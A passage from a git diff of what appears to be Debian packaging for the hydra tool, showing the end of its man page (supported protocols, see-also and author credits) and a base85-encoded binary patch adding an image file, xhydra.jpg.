MYSQL, NCP, NNTP, PCNFS, POP3, + POSTGRES, RDP, REXEC, SAP/R3, SMB, SMTP, SNMP, SOCKS5, SSH(v1 and v2), + Subversion, Teamspeak (TS2), TELNET, VMware-Auth, VNC and XMPP. +.SH SEE ALSO +.BR hydra (1), +.BR pw-inspector (1). +.br +.SH AUTHOR +hydra was written by van Hauser and co-maintained by David Maciejak . + +.PP +This manual page was written by Daniel Echeverry , +for the Debian project (and may be used by others). + diff --git a/xhydra.jpg b/xhydra.jpg new file mode 100755 index 0000000000000000000000000000000000000000..008d256c9c808107d3f3f231522b8ad8a2f2270d GIT binary patch literal 76954 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 